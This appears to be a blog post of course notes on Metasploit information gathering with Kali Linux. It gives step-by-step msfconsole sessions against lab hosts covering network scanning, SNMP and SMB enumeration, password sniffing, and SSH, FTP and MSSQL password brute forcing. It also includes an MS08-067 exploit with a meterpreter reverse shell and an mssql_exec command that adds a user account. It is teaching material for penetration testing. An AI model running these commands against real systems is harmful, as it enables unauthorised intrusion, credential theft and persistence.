This article records the detailed process of learning and using Kali Linux 2018.1 and penetration testing. The tutorial is the course "Kali Linux Penetration Testing" in the Security Niu Classroom

Kali Linux Penetration Testing (Yuan Fanghong) Blog Record

Module location:

The modules for information collection are all under auxiliary/scanner/

msf > use auxiliary/scanner/ [TAB]
Display all 531 possibilities? (y or n)

1. db_nmap

Like nmap usage, the results are stored in the msf database
```
msf > db_nmap -sV 10.10.10.0/24
```
auxiliary directory
RHOSTS <> RHOST
- 192.168.1.20-192.168.1.30、192.168.1.0/24,192.168.11.0/24
- You can also write a list of addresses: file:/root/h.txt

2. Host Discovery Scan

use auxiliary/scanner/discovery/arp_sweep

set INTERFACE、RHOSTS、SHOST、SMAC、THREADS；run

msf > search arp
msf > use auxiliary/scanner/discovery/arp_sweep
msf auxiliary(scanner/discovery/arp_sweep) > show options 
msf auxiliary(scanner/discovery/arp_sweep) > set RHOSTS 10.10.10.0/24
msf auxiliary(scanner/discovery/arp_sweep) > set INTERFACE eth0
msf auxiliary(scanner/discovery/arp_sweep) > set THREADS 20
msf auxiliary(scanner/discovery/arp_sweep) > run

3. Port Scan

use auxiliary/scanner/portscan/syn

set INTERFACE、PORTS、RHOSTS、THREADS；run

msf > search portscan
msf > use auxiliary/scanner/portscan/syn
msf auxiliary(scanner/portscan/syn) > show options 
msf auxiliary(scanner/portscan/syn) > set INTERFACE eth0
msf auxiliary(scanner/portscan/syn) > set PORTS 80
msf auxiliary(scanner/portscan/syn) > set RHOSTS 10.10.10.0/24
msf auxiliary(scanner/portscan/syn) > set THREADS 50
msf auxiliary(scanner/portscan/syn) > run

4. Zombie scan

Find ipidseq hosts (find zombies)

use auxiliary/scanner/ip/ipidseq
set RHOSTS 192.168.1.0/24 ；run

nmap -PN -sI 10.10.10.147 10.10.10.132

msf > use auxiliary/scanner/ip/ipidseq
msf auxiliary(scanner/ip/ipidseq) > show options 
msf auxiliary(scanner/ip/ipidseq) > set RHOSTS 10.10.10.100-150
msf auxiliary(scanner/ip/ipidseq) > set THREADS 20
msf auxiliary(scanner/ip/ipidseq) > run

msf > db_nmap -PN -sI 10.10.10.147 10.10.10.132

5. UDP Scan

use auxiliary/scanner/discovery/udp_sweep

use auxiliary/scanner/discovery/udp_probe

msf > use auxiliary/scanner/discovery/udp_sweep
msf auxiliary(scanner/discovery/udp_sweep) > show options 
msf auxiliary(scanner/discovery/udp_sweep) > set RHOSTS 10.10.10.100-150
msf auxiliary(scanner/discovery/udp_sweep) > run

msf > use auxiliary/scanner/discovery/udp_probe
msf auxiliary(scanner/discovery/udp_probe) > show options 
msf auxiliary(scanner/discovery/udp_probe) > set RHOSTS 10.10.10.100-150
msf auxiliary(scanner/discovery/udp_probe) > set CHOST 10.10.10.131
msf auxiliary(scanner/discovery/udp_probe) > set THREADS 20
msf auxiliary(scanner/discovery/udp_probe) > run

6. Password Sniffing

use auxiliary/sniffer/psnuffle
Supports extracting passwords from pacap capture files
Function similar to dsniff

Currently only supports pop3, imap, ftp, HTTP GET protocols

msf > search sniffer
msf > use auxiliary/sniffer/psnuffle
msf auxiliary(sniffer/psnuffle) > show options 
msf auxiliary(sniffer/psnuffle) > set INTERFACE eth0
msf auxiliary(sniffer/psnuffle) > run

root@kali:~# ftp 10.10.10.148

# 继续上述
msf auxiliary(sniffer/psnuffle) > show options
msf auxiliary(sniffer/psnuffle) > set PCAPFILE /root/ftp.pcapng
msf auxiliary(sniffer/psnuffle) > jobs
msf auxiliary(sniffer/psnuffle) > kill 0
msf auxiliary(sniffer/psnuffle) > run

7. SNMP Scanning

vim /etc/snmp/snmpd.conf (listen replication modified to 0.0.0.0:161)
use auxiliary/scanner/snmp/snmp_login
use auxiliary/scanner/snmp/snmp_enum
use auxiliary/scanner/snmp/snmp_enumusers （windows）

use auxiliary/scanner/snmp/snmp_enumshares （windows）

msf > use auxiliary/scanner/snmp/snmp_login
msf auxiliary(scanner/snmp/snmp_login) > show options 
msf auxiliary(scanner/snmp/snmp_login) > set RHOSTS 10.10.10.149
msf auxiliary(scanner/snmp/snmp_login) > set THREADS 20
msf auxiliary(scanner/snmp/snmp_login) > run

msf > use auxiliary/scanner/snmp/snmp_enum
msf auxiliary(scanner/snmp/snmp_enum) > show options 
msf auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 10.10.10.149
msf auxiliary(scanner/snmp/snmp_enum) > run

msf > use auxiliary/scanner/snmp/snmp_enum
msf auxiliary(scanner/snmp/snmp_enum) > show options 
msf auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 10.10.10.142 （windows）
msf auxiliary(scanner/snmp/snmp_enum) > run
msf auxiliary(scanner/snmp/snmp_enum) > set COMMUNITY jlcssadmin （SNMP 服务器团体名）
msf auxiliary(scanner/snmp/snmp_enum) > set THREADS 20
msf auxiliary(scanner/snmp/snmp_enum) > run

msf > use auxiliary/scanner/snmp/snmp_enumusers
msf auxiliary(scanner/snmp/snmp_enumusers) > show options 
msf auxiliary(scanner/snmp/snmp_enumusers) > set COMMUNITY jlcssadmin
msf auxiliary(scanner/snmp/snmp_enumusers) > set RHOSTS 10.10.10.142
msf auxiliary(scanner/snmp/snmp_enumusers) > run

msf > use auxiliary/scanner/snmp/snmp_enumshares
msf auxiliary(scanner/snmp/snmp_enumshares) > show options 
msf auxiliary(scanner/snmp/snmp_enumshares) > set COMMUNITY jlcssadmin
msf auxiliary(scanner/snmp/snmp_enumshares) > set RHOSTS 10.10.10.142
msf auxiliary(scanner/snmp/snmp_enumshares) > run

8. SMB Scan

SMB version scan
- use auxiliary/scanner/smb/smb_version
Scan command pipeline. Determine the SMB service type (account, password)
- use auxiliary/scanner/smb/pipe_auditor
Scan for RCERPC services accessible through SMB pipes
- use auxiliary/scanner/smb/pipe_dcerpc_auditor
SMB shared account (account, password)
- use auxiliary/scanner/smb/smb_enumshares
SMB user enumeration (account, password)
- use auxiliary/scanner/smb/smb_enumusers
SID enumeration (account, password)
- use auxiliary/scanner/smb/smb_lookupsid

SMB version scan

msf > search smb
msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(scanner/smb/smb_version) > show options 
msf auxiliary(scanner/smb/smb_version) > set RHOSTS 10.10.10.147, 10.10.10.148, 10.10.10.142
msf auxiliary(scanner/smb/smb_version) > run

# 继续上述
msf auxiliary(scanner/smb/smb_version) > set SMBUSER Administrator
msf auxiliary(scanner/smb/smb_version) > set SMBPass 123456
msf auxiliary(scanner/smb/smb_version) > run

Scan command pipeline. Determine the SMB service type (account, password)

msf > use auxiliary/scanner/smb/pipe_auditor
msf auxiliary(scanner/smb/pipe_auditor) > show options 
msf auxiliary(scanner/smb/pipe_auditor) > set RHOSTS 10.10.10.148
msf auxiliary(scanner/smb/pipe_auditor) > run

# 继续上述
msf auxiliary(scanner/smb/pipe_auditor) > set SMBUser Administrator
msf auxiliary(scanner/smb/pipe_auditor) > set SMBPass 123456

Scan for RCERPC services accessible through SMB pipes

msf > use auxiliary/scanner/smb/pipe_dcerpc_auditor
msf auxiliary(scanner/smb/pipe_dcerpc_auditor) > show options 
msf auxiliary(scanner/smb/pipe_dcerpc_auditor) > set RHOSTS 10.10.10.148
msf auxiliary(scanner/smb/pipe_dcerpc_auditor) > run

# 继续上述
msf auxiliary(scanner/smb/pipe_dcerpc_auditor) > set SMBUser Administrator
msf auxiliary(scanner/smb/pipe_dcerpc_auditor) > set SMBPass 123456
msf auxiliary(scanner/smb/pipe_dcerpc_auditor) > run

SMB shared account (account, password)

msf > use auxiliary/scanner/smb/smb_enumshares
msf auxiliary(scanner/smb/smb_enumshares) > show options 
msf auxiliary(scanner/smb/smb_enumshares) > set RHOSTS 10.10.10.148
msf auxiliary(scanner/smb/smb_enumshares) > run

# 继续上述
msf auxiliary(scanner/smb/smb_enumshares) > set SMBUser Administrator
msf auxiliary(scanner/smb/smb_enumshares) > set SMBPass 123456
msf auxiliary(scanner/smb/smb_enumshares) > run

SMB user enumeration (account, password)

msf > use auxiliary/scanner/smb/smb_enumusers
msf auxiliary(scanner/smb/smb_enumusers) > show options 
msf auxiliary(scanner/smb/smb_enumusers) > set RHOSTS 10.10.10.148
msf auxiliary(scanner/smb/smb_enumusers) > run

# 继续上述
msf auxiliary(scanner/smb/smb_enumusers) > set SMBUser Administrator
msf auxiliary(scanner/smb/smb_enumusers) > set SMBPass 123456
msf auxiliary(scanner/smb/smb_enumusers) > run

SID enumeration (account, password)

msf > use auxiliary/scanner/smb/smb_lookupsid
msf auxiliary(scanner/smb/smb_lookupsid) > show options 
msf auxiliary(scanner/smb/smb_lookupsid) > set RHOSTS 10.10.10.148

# 继续上述
msf auxiliary(scanner/smb/smb_lookupsid) > set SMBUser Administrator
msf auxiliary(scanner/smb/smb_lookupsid) > set SMBPass 123456
msf auxiliary(scanner/smb/smb_lookupsid) > run

9. SSH Scan

SSH version scan
- use auxiliary/scanner/ssh/ssh_version
SSH password blasting
- use auxiliary/scanner/ssh/ssh_login
  - set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt ；set VERBOSE false ；run
SSH public key login
- use auxiliary/scanner/ssh/ssh_login_pubkey
  - set KEY_FILE id_rsa；set USERNAME root ；run

SSH version scan

msf > use auxiliary/scanner/ssh/ssh_version
msf auxiliary(scanner/ssh/ssh_version) > set RHOSTS 10.10.10.132
msf auxiliary(scanner/ssh/ssh_version) > run

SSH password blasting

root@kali:~# more /usr/share/metasploit-framework/data/wordlists/root_userpass.txt 

msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(scanner/ssh/ssh_login) > set RHOSTS 10.10.10.132
msf auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
msf auxiliary(scanner/ssh/ssh_login) > set VERBOSE false 
msf auxiliary(scanner/ssh/ssh_login) > run

SSH public key login

msf > use auxiliary/scanner/ssh/ssh_login_pubkey
msf auxiliary(scanner/ssh/ssh_login_pubkey) > set RHOSTS 10.10.10.132
msf auxiliary(scanner/ssh/ssh_login_pubkey) > set USERNAME root
msf auxiliary(scanner/ssh/ssh_login_pubkey) > set KEY_PATH id_rsa_test_file

10. Windows missing patches

Detect based on acquired sessions
use post/windows/gather/enum_patches
- show advanced
- set VERBOSE yes
Check failed
- known bug in WMI query, try migrating to another process
- Migrate to another process and try again

ms08-067

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(windows/smb/ms08_067_netapi) > set RHOST 10.10.10.147
msf exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
msf exploit(windows/smb/ms08_067_netapi) > run

meterpreter > backgroun
msf exploit(windows/smb/ms08_067_netapi) > sessions

msf exploit(windows/smb/ms08_067_netapi) > use post/windows/gather/enum_patches
msf post(windows/gather/enum_patches) > set SESSION 4
msf post(windows/gather/enum_patches) > run

# 进程错误，迁移进程
msf post(windows/gather/enum_patches) > sessions -i 4
meterpreter > getpid
meterpreter > ps
meterpreter > migrate 828  # spoolsv.exe
meterpreter > background 
msf post(windows/gather/enum_patches) > run

11. mssql scan

mssql scan port
- TCP 1422 (dynamic port) / UDP 1434 (query TCP port number)
- use auxiliary/scanner/mssql/mssql_ping
Blasting mssql password
- use auxiliary/scanner/mssql/mssql_login
Remote code execution (after obtaining database permissions)
- use auxiliary/admin/mssql/mssql_exec
- set CMD net user user1 pass123 /ADD

mssql scan port

msf > use auxiliary/scanner/mssql/mssql_ping
msf auxiliary(scanner/mssql/mssql_ping) > set RHOSTS 10.10.10.142
msf auxiliary(scanner/mssql/mssql_ping) > run

12. FTP Scan

ftp version scan
- use auxiliary/scanner/ftp/ftp_version
- use auxiliary/scanner/ftp/anonymous
- use auxiliary/scanner/ftp/ftp_login
use auxiliary/scanner/ [tab]
- Display all 479 possibilities? (y or n)

Query version information

msf > use auxiliary/scanner/ftp/ftp_version
msf auxiliary(scanner/ftp/ftp_version) > set RHOSTS 10.10.10.132
msf auxiliary(scanner/ftp/ftp_version) > run

Whether to allow anonymous login

msf > use auxiliary/scanner/ftp/anonymous
msf auxiliary(scanner/ftp/anonymous) > set RHOSTS 10.10.10.132
msf auxiliary(scanner/ftp/anonymous) > run

Brute force
```
use auxiliary/scanner/ftp/ftp_login
```

Kali Linux Penetration Testing 143 Mestasploit Information Gathering